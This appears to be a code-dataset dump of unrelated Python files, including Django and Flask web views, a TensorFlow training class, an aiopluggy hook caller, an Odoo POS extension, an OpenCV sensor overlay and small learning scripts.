\"All\"})\n for letter in string.uppercase:\n filterOptions.append({'value' : letter,\n 'label' : letter})\n\n menu_html = menus.generate(request, menu_heading,\n menu_cur_app, menu_cur_view)\n\n return render_to_response(\"location_selector/templates/\" +\n \"select_by_level.html\",\n {'menu_html' : menu_html,\n 'level' : level,\n 'first' : first_letter,\n 'page' : page,\n 'filter_options' : filterOptions,\n 'search_text' : search_text,\n 'base_url' : base_url,\n 'cancel_url' : cancel_url,\n },\n context_instance=RequestContext(request))\n\n#############################################################################\n\ndef search(request, selector_id):\n \"\"\" Respond to the \"/search\" URL.\n\n We perform searches by location code or location name.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseRedirect(reverse(settings.ADMIN_HOME_VIEW))\n\n if request.method == \"GET\":\n params = request.GET\n elif request.method == \"POST\":\n params = request.POST\n\n if \"location_selector\" not in request.session:\n # Should never happen.\n return HttpResponseRedirect(reverse(settings.ADMIN_HOME_VIEW))\n\n info = request.session['location_selector']['selectors'][int(selector_id)]\n \n menu_heading = info['menu_heading']\n menu_cur_app = info['menu_cur_app']\n menu_cur_view = info['menu_cur_view']\n base_url = info['base_url']\n\n cancel_url = reverse(menu_cur_app + \".views.\" + menu_cur_view)\n\n if params.get(\"back\") != None:\n # The user clicked on our \"Back\" button -> redisplay the view\n # containing the location selector.\n return HttpResponseRedirect(cancel_url)\n\n if params.get(\"loc_code\") not in [None, \"\"]:\n # The user entered a location code. Attempt to search against this\n # code.\n loc_code = params['loc_code']\n\n try:\n location = Location.objects.get(code=loc_code)\n except Location.DoesNotExist:\n location = None\n\n if location != None:\n return HttpResponseRedirect(base_url + loc_code)\n else:\n menu_html = menus.generate(request, menu_heading,\n menu_cur_app, menu_cur_view)\n\n err_msg = \"There is no location with the code '\" + loc_code + \"'\"\n\n return render_to_response(\"search_error.html\",\n {'menu_html' : menu_html,\n 'err_msg' : err_msg,\n 'cancel_url' : cancel_url},\n context_instance=RequestContext(request))\n\n if params.get(\"loc_name\") not in [None, \"\"]:\n # The user entered a location name. Attempt to search against this\n # name.\n name = helpers.tidy_name(params['loc_name'])\n\n locations = []\n for nameRecord in Name.objects.filter(name=name.upper()):\n for loc_name in LocationName.objects.filter(name=nameRecord):\n loc = loc_name.location\n if loc not in locations:\n locations.append(loc)\n\n if len(locations) == 0:\n # Tell the user the bad news.\n menu_html = menus.generate(request, menu_heading,\n menu_cur_app, menu_cur_view)\n\n err_msg = \"There are no locations with the name '\" + name + \"'\"\n\n return render_to_response(\"search_error.html\",\n {'menu_html' : menu_html,\n 'err_msg' : err_msg,\n 'cancel_url' : cancel_url},\n context_instance=RequestContext(request))\n else:\n menu_html = menus.generate(request, menu_heading,\n menu_cur_app, menu_cur_view)\n return render_to_response(\"search_results.html\",\n {'menu_html' : menu_html,\n 'name' : name,\n 'locations' : locations,\n 'base_url' : base_url},\n context_instance=RequestContext(request))\n\n","sub_path":"apps/location_selector/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243290884","text":"import asyncio\nimport weakref\n\nimport sys\n\nfrom .hooks import HookSpec\nfrom .helpers import Result\n\n\ndef _priority_groups(hookimpls):\n result = [[], [], []]\n for h in hookimpls:\n if h.is_try_first:\n result[0].append(h)\n elif not h.is_try_last:\n result[1].append(h)\n else:\n result[2].append(h)\n return result\n\n\nclass HookCaller(object):\n def __init__(self, name, plugin_manager):\n self.name = name\n \"\"\":type: str\"\"\"\n self._plugin_manager = weakref.ref(plugin_manager)\n self.before = []\n \"\"\":type: list[aiopluggy.hooks.HookImpl]\"\"\"\n self.functions = []\n \"\"\":type: list[aiopluggy.hooks.HookImpl]\"\"\"\n self.spec = None\n \"\"\":type: aiopluggy.hooks.HookSpec\"\"\"\n\n @property\n def plugin_manager(self):\n \"\"\":rtype: aiopluggy.PluginManager\"\"\"\n return self._plugin_manager()\n\n def set_spec(self, namespace, flag_set):\n assert self.spec is None\n self.spec = HookSpec(namespace, self.name, flag_set)\n for hookimpl in (self.before + self.functions):\n hookimpl.validate_against(self.spec)\n\n def add_hookimpl(self, hookimpl):\n \"\"\"A an implementation to the callback chain.\n \"\"\"\n if self.spec:\n hookimpl.validate_against(self.spec)\n\n if hookimpl.is_before:\n methods = self.before\n else:\n methods = self.functions\n\n if hookimpl.is_try_last:\n methods.insert(0, hookimpl)\n elif hookimpl.is_try_first:\n methods.append(hookimpl)\n else:\n # find last non-try_first method\n i = len(methods) - 1\n while i >= 0 and methods[i].is_try_first:\n i -= 1\n methods.insert(i + 1, hookimpl)\n\n def __repr__(self):\n return \"\" % (self.name,)\n\n def __call__(self, *args, **kwargs):\n if args:\n raise TypeError(\"hook calling supports only keyword arguments\")\n spec = self.spec\n if spec is None:\n return self._multicall_sync(\n caller_kwargs=kwargs\n )\n notinspec = set(kwargs.keys()) - spec.req_args - set(spec.opt_args.keys())\n if notinspec:\n raise TypeError(\n # TODO: show spec signature\n \"Argument(s) %s not declared in hookspec\" % (notinspec,),\n )\n notincall = spec.req_args - set(kwargs.keys())\n if notincall:\n raise TypeError(\n # TODO: show spec signature\n \"Missing required argument(s): %s\" % (notincall,)\n )\n if spec.is_replay:\n self.plugin_manager.history.append((self.name, kwargs))\n if spec.is_first_notnone or spec.is_first_only:\n return self._multicall_first_sync(kwargs, spec.is_first_only) \\\n if spec.is_sync \\\n else self._multicall_first_async(kwargs, spec.is_first_only)\n return self._multicall_sync(kwargs) \\\n if spec.is_sync \\\n else self._multicall_async(kwargs)\n\n def replay(self, function_, kwargs):\n return self._multicall_first_sync(\n kwargs, first_only=True, functions=[function_]\n )\n\n async def _call_befores(self, caller_kwargs):\n async def call_befores(hookimpl_group):\n awaitables = []\n # noinspection PyBroadException\n try: # <-- to cancel any unfinished awaitables\n for hookimpl in reversed(hookimpl_group):\n kwargs = hookimpl.filtered_args(caller_kwargs)\n if hookimpl.is_async:\n awaitables.append(asyncio.ensure_future(\n hookimpl.function(**kwargs)\n ))\n else:\n hookimpl.function(**kwargs)\n if len(awaitables) > 0:\n for f in asyncio.as_completed(awaitables):\n await f\n except Exception:\n for a in awaitables:\n if not a.done():\n a.cancel()\n raise\n\n for group in _priority_groups(self.before):\n await call_befores(group)\n\n def _call_befores_sync(self, caller_kwargs):\n # noinspection PyBroadException\n for hookimpl in reversed(self.before):\n kwargs = hookimpl.filtered_args(caller_kwargs)\n hookimpl.function(**kwargs)\n\n async def _multicall_async(self, caller_kwargs, functions=None):\n \"\"\"Execute a call into multiple python methods.\n\n ``caller_kwargs`` comes from HookCaller.__call__().\n\n \"\"\"\n # __tracebackhide__ = True\n if functions is None:\n functions = self.functions\n await self.plugin_manager.await_unscheduled_coros()\n await self._call_befores(caller_kwargs=caller_kwargs)\n retval = []\n\n async def multicall_parallel(hookimpl_group):\n awaitables = []\n # noinspection PyBroadException\n try: # <-- to cancel any unfinished awaitables\n for hookimpl in reversed(hookimpl_group):\n kwargs = hookimpl.filtered_args(caller_kwargs)\n if hookimpl.is_async:\n awaitables.append(hookimpl.function(**kwargs))\n else:\n # noinspection PyBroadException\n try:\n retval.append(Result(hookimpl.function(**kwargs)))\n except Exception:\n retval.append(Result(exc_info=sys.exc_info()))\n except Exception:\n for a in awaitables:\n asyncio.ensure_future(a).cancel()\n raise\n if len(awaitables) > 0:\n for f in asyncio.as_completed(awaitables):\n # noinspection PyBroadException\n try:\n retval.append(Result(await f))\n except Exception:\n retval.append(Result(exc_info=sys.exc_info()))\n\n for group in _priority_groups(functions):\n await multicall_parallel(group)\n return retval\n\n def _multicall_sync(self, caller_kwargs, functions=None):\n \"\"\"Execute a call into multiple python methods.\n\n Called from :func:`HookCaller.__call__`.\n\n \"\"\"\n # __tracebackhide__ = True\n if functions is None:\n functions = self.functions\n self._call_befores_sync(caller_kwargs=caller_kwargs)\n retval = []\n for hookimpl in reversed(functions):\n kwargs = hookimpl.filtered_args(caller_kwargs)\n # noinspection PyBroadException\n try:\n retval.append(Result(hookimpl.function(**kwargs)))\n except Exception:\n retval.append(Result(exc_info=sys.exc_info()))\n return retval\n\n async def _multicall_first_async(self, caller_kwargs, first_only, functions=None):\n \"\"\"Execute a call into multiple python methods.\n\n ``caller_kwargs`` comes from HookCaller.__call__().\n\n \"\"\"\n # __tracebackhide__ = True\n if functions is None:\n functions = self.functions\n await self.plugin_manager.await_unscheduled_coros()\n await self._call_befores(caller_kwargs=caller_kwargs)\n for hookimpl in reversed(functions):\n kwargs = hookimpl.filtered_args(caller_kwargs)\n # noinspection PyBroadException\n result = hookimpl.function(**kwargs)\n if hookimpl.is_async:\n result = await result\n if first_only or result is not None:\n return result\n return None\n\n def _multicall_first_sync(self, caller_kwargs, first_only, functions=None):\n \"\"\"Execute a call into multiple python methods.\n\n Called from :func:`HookCaller.__call__`.\n\n \"\"\"\n # __tracebackhide__ = True\n if functions is None:\n functions = self.functions\n self._call_befores_sync(caller_kwargs=caller_kwargs)\n for hookimpl in reversed(functions):\n kwargs = hookimpl.filtered_args(caller_kwargs)\n result = hookimpl.function(**kwargs)\n if first_only or result is not None:\n return result\n return None\n","sub_path":"aiopluggy/hook_caller.py","file_name":"hook_caller.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"599214584","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\n\nimport sys\nsys.path.append(\"../base\")\nfrom base_func import Batch,Loss,Accuracy,Optimization\n\nclass Model(object):\n def __init__(self,name):\n self.name = name\n self.momentum = 0.5\n self.output_act_func='softmax'\n self.loss_func='mse'\n self.bp_algorithm = 'sgd'\n self.best_average_acc = 0\n self.pt_model = None\n self.loss = None\n self.accuracy = None\n self.train_batch = None\n self.merge = None\n \n def build_train_step(self):\n # 损失\n if self.loss is None:\n _loss=Loss(label_data=self.label_data,\n pred=self.pred,\n output_act_func=self.output_act_func)\n self.loss = _loss.get_loss_func(self.loss_func) # + 0.5*tf.matrix_determinant(tf.matmul(self.out_W,tf.transpose(self.out_W)))\n # 正确率\n if self.accuracy is None:\n \n _ac=Accuracy(label_data=self.label_data,\n pred=self.pred)\n self.accuracy=_ac.accuracy()\n \n # 构建训练步\n if self.train_batch is None:\n if self.bp_algorithm=='adam' or self.bp_algorithm=='rmsp': \n self.global_step = None\n self.r = self.lr\n else: \n self.global_step = tf.Variable(0, trainable=False) # minimize 中会对 global_step 自加 1\n self.r = tf.train.exponential_decay(learning_rate=self.lr, global_step=self.global_step, decay_steps=100, decay_rate=0.96, staircase=True)\n \n self._optimization=Optimization(r=self.r,momentum=self.momentum)\n self.train_batch=self._optimization.trainer(algorithm=self.bp_algorithm).minimize(self.loss,global_step=self.global_step)\n \n def train_model(self,train_X,train_Y=None,val_X=None,val_Y=None,sess=None,summ=None,load_saver=''):\n pt_save_path='../saver/'+self.name+'/pre-train.ckpt'\n ft_save_path='../saver/'+self.name+'/fine-tune.ckpt'\n saver = tf.train.Saver()\n if load_saver=='load_f':\n # 加载训练好的模型\n print(\"Load Fine-tuned model...\")\n saver.restore(sess,ft_save_path)\n return\n elif load_saver=='load_p':\n # 加载预训练的模型\n print(\"Load Pre-trained model...\")\n saver.restore(sess,pt_save_path)\n elif self.pt_model is not None:\n # 开始预训练\n print(\"Start Pre-training...\")\n self.pt_model.train_model(train_X=train_X,sess=sess,summ=summ)\n print(\"Save Pre-trained model...\")\n saver.save(sess,pt_save_path)\n # 开始微调\n print(\"Start Fine-tuning...\")\n _data=Batch(images=train_X,\n labels=train_Y,\n batch_size=self.batch_size)\n n=train_X.shape[0]\n m=int(n/self.batch_size)\n mod=max(int(self.epochs*m/1000),1)\n \n # 迭代次数\n k=0\n for i in range(self.epochs):\n sum_loss = 0\n sum_acc = 0\n for _ in range(m): \n k=k+1\n batch_x, batch_y= _data.next_batch()\n # batch_x, batch_y= batch_x[:int(self.batch_size/4),:], batch_y[:int(self.batch_size/4),:]\n summary,loss,acc,_=sess.run([self.merge,self.loss,self.accuracy,self.train_batch],feed_dict={\n self.input_data: batch_x,\n self.label_data: batch_y,\n self.keep_prob: 1-self.dropout})\n #**************** 写入 ******************\n if k%mod==0: summ.train_writer.add_summary(summary, k)\n #****************************************\n sum_loss =sum_loss+loss\n sum_acc = sum_acc + acc\n loss = sum_loss/m\n acc = sum_acc/m\n print('>>> epoch = {} , loss = {:.4} , accuracy = {:.4}'.format(i+1,loss,acc))\n if val_X is not None:\n self.validation_model(val_X,val_Y,sess)\n \n print(\"Save model...\")\n saver.save(sess,ft_save_path)\n \n def unsupervised_train_model(self,train_X,sess,summ):\n _data=Batch(images=train_X,\n labels=None,\n batch_size=self.batch_size)\n n=train_X.shape[0]\n m=int(n/self.batch_size)\n mod=max(int(self.epochs*m/1000),1)\n \n # 迭代次数\n k=0\n for i in range(self.epochs):\n sum_loss = 0\n for _ in range(m):\n k=k+1\n batch_x = _data.next_batch()\n summary,loss,_=sess.run([self.merge,self.loss,self.train_batch],feed_dict={\n self.input_data: batch_x,\n self.label_data: batch_x})\n #**************** 写入 ******************\n if k%mod==0: summ.train_writer.add_summary(summary, k)\n #****************************************\n sum_loss =sum_loss+loss\n loss = sum_loss/m\n print('>>> epoch = {} , loss = {:.4}'.format(i+1,loss))\n \n def test_model(self,test_X,test_Y,sess):\n if self.use_for=='classification':\n acc,pred_y=sess.run([self.accuracy,self.pred],feed_dict={\n self.input_data: test_X,\n self.label_data: test_Y,\n self.keep_prob: 1.0})\n print('[Accuracy]: %f' % acc)\n return acc,pred_y\n else:\n mse,pred_y=sess.run([self.loss,self.pred],feed_dict={\n self.input_data: test_X,\n self.label_data: test_Y,\n self.keep_prob: 1.0})\n print('[MSE]: %f' % mse)\n return mse,pred_y\n \n def validation_model(self,val_X,val_Y,sess):\n if type(val_X)==list:\n n_class = len(val_X)\n acc=np.zeros(n_class)\n for i in range(n_class):\n if i==3 or i==9 or i==15: continue\n acc[i]=sess.run(self.accuracy,feed_dict={\n self.input_data: val_X[i],\n self.label_data: val_Y[i],\n self.keep_prob: 1.0})\n average_acc = np.sum(acc)/19\n print(' >>> validation accuracy = {:.4}'.format(average_acc))\n if average_acc > self.best_average_acc:\n self.best_average_acc = average_acc\n self.best_acc_array = acc","sub_path":"models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"608661122","text":"from markupsafe import escape\nfrom flask import Flask, url_for, render_template, request\nimport sqlite3\napp = Flask(__name__)\n\n@app.route('/')\ndef main(chat_alldata=None):\n con = sqlite3.connect('chat.db')\n cur = con.cursor()\n\n if 'name' in request.args and request.args['name'] != \"\":\n cur.execute(\"select * from chat where name=? \", (request.args['name'],))\n print(\"true\")\n else:\n cur.execute(\"select * from chat \")\n print(\"false\")\n\n chat_alldata = cur.fetchall()\n con.close()\n print(\"chat_alldataは\", chat_alldata, \"です。\")\n return render_template('chat.html', chat_alldata=chat_alldata)\n\n@app.route('/submit',methods=['POST']) \ndef submit():\n con = sqlite3.connect('chat.db')\n cur = con.cursor()\n cur.execute(\"insert into chat values (?, ?)\", (request.form[\"chat_name\"] , request.form[\"chat_text\"]))\n con.commit()\n con.close()\n return \"%s, %s\" % (request.form[\"chat_name\"],request.form[\"chat_text\"])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541205506","text":"# File: 01_hello.py\n# Author: Raphael Holzer\n# Date: 26. 11. 2018\n\n# from import \nfrom sense_hat import SenseHat\n\n# create a new SenseHat object\nsense = SenseHat()\nsense.set_rotation(180)\nred = (255, 0, 0)\n\n# infinite loop\nwhile True:\n # use the method 'show_message'\n sense.show_message('Bonjour, ici la Terre!', scroll_speed = 0.1, text_colour = red)\n","sub_path":"sensehat/01_hello.py","file_name":"01_hello.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"554839621","text":"def ver_aliquota(salario):\n if salario <= 1903.98:\n aliquota = 0\n elif salario >= 1903.99 and salario <= 2826.65:\n aliquota = 0.075\n elif salario >= 2826.65 and salario <= 3751.06:\n aliquota = 0.15\n elif salario >= 3751.06 and salario <= 4664.68:\n aliquota = 0.225\n else:\n aliquota = 0.275\n\n return aliquota\n\ndef print_alinhado(a, b, c, d):\n print('{:<8} {:<10} {:<10} {:<6}'.format(a, b, c, d))\n\nnome = input(\"Nome: \")\nsalario = float(input(\"Salário: \"))\naliquota = ver_aliquota(salario)\nir = salario * aliquota\n\nprint_alinhado('Nome', 'Salário', 'Alíquota', 'IR')\nprint_alinhado(nome, salario, aliquota, ir)\n","sub_path":"salario_e_aliquotas.py","file_name":"salario_e_aliquotas.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"620420473","text":"\"\"\"\nGiven an integer array nums, find the sum of the elements between indices i and j (i ≤ j), inclusive.\n\nThe update(i, val) function modifies nums by updating the element at index i to val.\nExample:\nGiven nums = [1, 3, 5]\n\nsumRange(0, 2) -> 9\nupdate(1, 2)\nsumRange(0, 2) -> 8\nNote:\nThe array is only modifiable by the update function.\nYou may assume the number of calls to update and sumRange function is distributed evenly.\n\n\"\"\"\n\n#https://leetcode.com/articles/range-sum-query-mutable/\nclass NumArray(object):\n def __init__(self, nums):\n \"\"\"\n initialize your data structure here.\n :type nums: List[int]\n \"\"\"\n self.n = len(nums)\n self.tree = [0]* (2*self.n)\n \n #build trees\n for i, j in zip( xrange(self.n, 2*self.n), xrange(self.n)):\n self.tree[i] = nums[j]\n \n for i in xrange(self.n-1, 0, -1):\n self.tree[i] = self.tree[2*i] + self.tree[2*i + 1]\n \n\n def update(self, i, val):\n \"\"\"\n :type i: int\n :type val: int\n :rtype: int\n \"\"\"\n pos = self.n + i\n self.tree[pos] =val\n while pos> 0:\n left = pos\n right = pos\n if pos %2 ==0:#pos is on the left side\n right = pos + 1\n else:\n left = pos -1\n self.tree[pos/2] = self.tree[left] + self.tree[right]\n pos /= 2\n \n\n def sumRange(self, i, j):\n \"\"\"\n sum of elements nums[i..j], inclusive.\n :type i: int\n :type j: int\n :rtype: int\n \"\"\"\n l = i + self.n\n r = j + self.n\n \n sum = 0\n while l<=r:\n if l%2 == 1:\n sum += self.tree[l]\n l = l + 1\n if r %2 == 0:\n sum += self.tree[r]\n r = r -1\n l /= 2\n r /= 2\n return sum\n \n# Your NumArray object will be instantiated and called as such:\n# numArray = NumArray(nums)\n# numArray.sumRange(0, 1)\n# numArray.update(1, 10)\n# numArray.sumRange(1, 2)\n","sub_path":"307. Range Sum Query - Mutable.py","file_name":"307. Range Sum Query - Mutable.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114633098","text":"import datetime\n\nstd_map = {\n\t'KE' : 'Kenya',\n\t'UG' : 'Uganda',\n\t'TZ' : 'Tanzania'\n}\n\npresent = {} #empty dictionary will gold students who attended class on a particular day.\n\n\nclass Student(object):\n\t'''\n\tClass to create students who attended a class on a given day.\n\t'''\n\tstd_id = 0 #Initializes the student id to enable allocation of progressive IDs to consecutive students.\n\tnew_date = datetime.date.today()\n\n\tdef __init__(self, fname = '', lname = '', country = std_map['KE'] ,\\\n\t date = datetime.date.today()):\n\t\tStudent.std_id += 1#Increment the value of ID each time a student obj is created\n\t\tself.id = Student.std_id\n\t\tself.fname = fname\n\t\tself.lname = lname\n\t\tself.country = country\n\n\tdef set_present(**kwargs):\n\t\tself.date = date\n\t\tself.data = { #default student data\n\t\t\t'location' : 'Hogwarts',\n\t\t\t'teacher' : 'Alex',\n\t\t}\n\t\tself.data.update(kwargs)\n\t\tpresent[self.fname + \" \" + self.lname] = self.date\n\t#def set_present(self):\n","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"586273908","text":"import argparse\nimport itertools\nimport json\nimport os\n\nimport chainer\nimport numpy as np\nimport nibabel as nib\nimport pandas as pd\n\nfrom load import load_nifti\nfrom model import VoxResNet\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"segment with VoxResNet\")\n parser.add_argument(\n \"--input_file\", \"-i\", type=str,\n help=\"input json file of test dataset\")\n parser.add_argument(\n \"--output_suffix\", \"-o\", type=str, default=\"_segTRI_predict.nii.gz\",\n help=\"result of the segmentation, default=_segTRI_predict.nii.gz\")\n parser.add_argument(\n \"--model\", \"-m\", type=str,\n help=\"a file containing parameters of trained VoxResNet\")\n parser.add_argument(\n \"--shape\", type=int, nargs=\"*\", action=\"store\",\n default=[80, 80, 80],\n help=\"input patch shape of VoxResNet, default=[80, 80, 80]\")\n parser.add_argument(\n \"--gpu\", \"-g\", default=-1, type=int,\n help=\"negative value indicates no gpu, default=-1\")\n args = parser.parse_args()\n print(args)\n\n with open(args.input_file) as f:\n dataset = json.load(f)\n test_df = pd.DataFrame(dataset[\"data\"])\n\n vrn = VoxResNet(dataset[\"in_channels\"], dataset[\"n_classes\"])\n chainer.serializers.load_npz(args.model, vrn)\n\n if args.gpu >= 0:\n chainer.cuda.get_device(args.gpu).use()\n vrn.to_gpu()\n xp = chainer.cuda.cupy\n else:\n xp = np\n\n for image_path, subject in zip(test_df[\"image\"], test_df[\"subject\"]):\n image, affine = load_nifti(image_path, with_affine=True)\n image = image.transpose(3, 0, 1, 2)\n slices = [[], [], []]\n for img_len, patch_len, slices_ in zip(image.shape[1:], args.shape, slices):\n assert img_len > patch_len, (img_len, patch_len)\n stride = int((img_len - patch_len) / int(img_len / patch_len))\n for i in range(int(img_len / patch_len)):\n slices_.append(slice(i * stride, i * stride + patch_len))\n slices_.append(slice(img_len - patch_len, img_len))\n output = np.zeros((dataset[\"n_classes\"],) + image.shape[1:])\n for xslice, yslice, zslice in itertools.product(*slices):\n patch = image[slice(None), xslice, yslice, zslice]\n patch = np.expand_dims(patch, 0)\n x = xp.asarray(patch)\n output[slice(None), xslice, yslice, zslice] += chainer.cuda.to_cpu(\n vrn(x).data[0])\n y = np.argmax(output, axis=0)\n nib.save(\n nib.Nifti1Image(np.int32(y), affine),\n os.path.join(\n os.path.dirname(image_path),\n subject + args.output_suffix))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"150392065","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, tools, _\nfrom datetime import datetime\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass PosOrder(models.Model):\n _inherit = 'pos.order'\n\n dosificacion_actual = fields.Many2one('dosificacion.boliviana', string='Dosificación Actual', readonly=True)\n monto_pagado = fields.Float(string='Pago de venta', digits=0)\n\n @api.model\n def _order_fields(self, ui_order):\n result = super(PosOrder, self)._order_fields(ui_order)\n result['dosificacion_actual'] = self.env['pos.session'].browse(ui_order['pos_session_id']).dosificacion_actual.id\n result['monto_pagado'] = ui_order['amount_paid']\n return result\n\n def _prepare_invoice(self):\n result = super(PosOrder, self)._prepare_invoice()\n result['dosificacion_actual'] = self.session_id.dosificacion_actual.id\n result['nit_factura'] = self.partner_id.ci_nit\n result['razon_social_factura'] = self.partner_id.razon_social\n result['date_invoice'] = datetime.today()\n result['tipo_factura'] = 'Computarizada'\n return result\n\n @api.depends('statement_ids', 'lines.price_subtotal_incl', 'lines.discount')\n def _compute_amount_all(self):\n for order in self:\n order.amount_paid = order.amount_return = order.amount_tax = 0.0\n currency = order.pricelist_id.currency_id\n order.amount_paid = sum(payment.amount for payment in order.statement_ids)\n order.amount_return = sum(payment.amount < 0 and payment.amount or 0 for payment in order.statement_ids)\n order.amount_tax = currency.round(sum(self._amount_line_tax(line, order.fiscal_position_id) for line in order.lines))\n amount_total_incluid_tax = currency.round(sum(line.price_subtotal_incl for line in order.lines))\n order.amount_total = amount_total_incluid_tax\n\nclass PosOrderLine(models.Model):\n _inherit = 'pos.order.line'\n\n tipo_pedido = fields.Char(string='Tipo Pedido', help='Detalle de los pedidos si son para llevar o para la mesa')","sub_path":"acoim_pos_facturacion/models/pos_order.py","file_name":"pos_order.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"30212873","text":"import cv2\nimport numpy as np\n\n\nclass Visualizer():\n sound_level_list:list = []\n for x in range(0, 150):\n sound_level_list.append(0)\n height: int = 480\n width: int = 640\n url: str = None\n capture = None\n gas_level_threshold: int = .6\n\n def __init__(self, url):\n self.capture = cv2.VideoCapture(0)\n # self.capture = cv2.VideoCapture(self.url)\n\n def get_frame(self, forward_amount: int, turning_amount: int,\n microphone_level: float, gas_level: float, light_on: bool,\n wifi_network: str, motion_detected: bool):\n green_light = cv2.imread(\"D:\\Sohom\\Programming_Data\\Synopsys2020\\OnGroundRobot\\green_light.png\")\n green_light = cv2.resize(green_light, (30, 40), interpolation=cv2.INTER_AREA)\n\n ret, frame = self.capture.read()\n if not ret: return None\n\n frame = cv2.resize(frame, (self.width, self.height), interpolation=cv2.INTER_AREA)\n\n # draw forward backward arrow\n start_point = (60, 350)\n end_point = (90, int(350 - forward_amount * 60))\n color = (255, 255, 0)\n thickness = -1\n\n if (forward_amount != 0):\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n\n pts = np.array([[75 - 40, 350 - forward_amount * 60], [75 + 40, 350 - forward_amount * 60],\n [75, 350 - forward_amount * 120]], np.int32)\n pts = pts.reshape((-1, 1, 2))\n frame = cv2.fillPoly(frame, [pts], (255, 255, 0))\n\n # draw forward backward arrow\n start_point = (475, 360)\n end_point = (int(475-turning_amount*60), 390)\n color = (255, 255, 0)\n thickness = -1\n if (turning_amount != 0):\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n pts = np.array([[475 - turning_amount * 60, 375 - 40], [474 - turning_amount * 60, 375 + 40,],\n [475 - turning_amount * 120, 375]], np.int32)\n pts = pts.reshape((-1, 1, 2))\n frame = cv2.fillPoly(frame, [pts], (255, 255, 0))\n\n #write text for wifi network\n frame = cv2.putText(frame, wifi_network, (460, 30), cv2.FONT_HERSHEY_DUPLEX, .8,\n (0, 0, 255), 1)\n\n # add graphic for light\n if light_on:\n x_offset = 425\n y_offset = 0\n frame[y_offset:y_offset + green_light.shape[0], x_offset:x_offset + green_light.shape[1]] = green_light\n\n # add graphic for gas reading\n start_point = (570, 300)\n end_point = (590, int(300 - gas_level*100))\n if (gas_level>self.gas_level_threshold):\n color = (0, 0, 255)\n else:\n color = (0, 255, 0)\n thickness = -1\n\n\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n\n pts = np.array([[550, 300 - self.gas_level_threshold*100-10], [550, 300 - self.gas_level_threshold*100+10],\n [570, 300-self.gas_level_threshold*100]], np.int32)\n pts = pts.reshape((-1, 1, 2))\n frame = cv2.fillPoly(frame, [pts], (255, 255, 0))\n\n #add graphic for motion detected\n if (motion_detected):\n text: str = \"Motion Detected\"\n else :\n text: str = \"No Motion\"\n\n frame = cv2.putText(frame, text, (50, 30), cv2.FONT_HERSHEY_DUPLEX, .8,\n (0, 0, 255), 1)\n\n #display for sound level over time\n if (len(self.sound_level_list)>150):\n del self.sound_level_list[0]\n self.sound_level_list.append(microphone_level)\n\n start_point = (24, 40)\n end_point = (30, 150)\n color = (255, 255, 0)\n thickness = -1\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n\n start_point = (25, 150)\n end_point = (185, 155)\n color = (255, 255, 0)\n thickness = -1\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n\n count:int = 0\n for x in self.sound_level_list:\n frame[int(145-x*100):int(145-x*100)+5, 30+count:30+count+5] = (0, int(255-x*255), int(x*255))\n count+=1\n\n frame = cv2.putText(frame, \"Sound Level\", (30, 180), cv2.FONT_HERSHEY_DUPLEX, .8,\n (255, 255, 0), 1)\n\n #scale up screen\n scale: float = 1.2\n frame = cv2.resize(frame, (int(640*scale), int(480*scale)), interpolation=cv2.INTER_AREA)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n return None\n return frame\n\n def release_visualizer(self):\n self.capture.release()\n cv2.destroyAllWindows()\n\n\ndef main():\n vis = Visualizer(\"\")\n count: float = 0;\n direction: int = 1\n while True:\n frame = vis.get_frame(count, count, 0, 0, True, \"Home Wifi\", True, 0)\n if frame is None:\n break\n cv2.imshow(\"camera stream\", frame)\n\n if count > 1:\n direction = -1\n if count < -1:\n direction = 1\n\n count += .05 * direction\n\n vis.release_visualizer()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"OnGroundRobot/Visualizer.py","file_name":"Visualizer.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392549649","text":"# -*- coding: utf-8 -*-\n# coding: utf-8\n# @Author : WeiXin\n# 忽略版本警告\nimport warnings\n\nwarnings.filterwarnings('ignore')\nfrom jpype import *\nimport jpype.imports\nfrom jpype.types import *\nimport os.path\nimport numpy as np\n\n\n\nimport joblib\nfrom rdkitfingerprint import *\nfrom cdkfingerprint import *\nimport pickle\ncurrent_path = os.path.dirname(__file__)\n#print(current_path)\n\n\ndef SelectAlgorithm(algorithmtype):\n job = joblib.load( current_path + 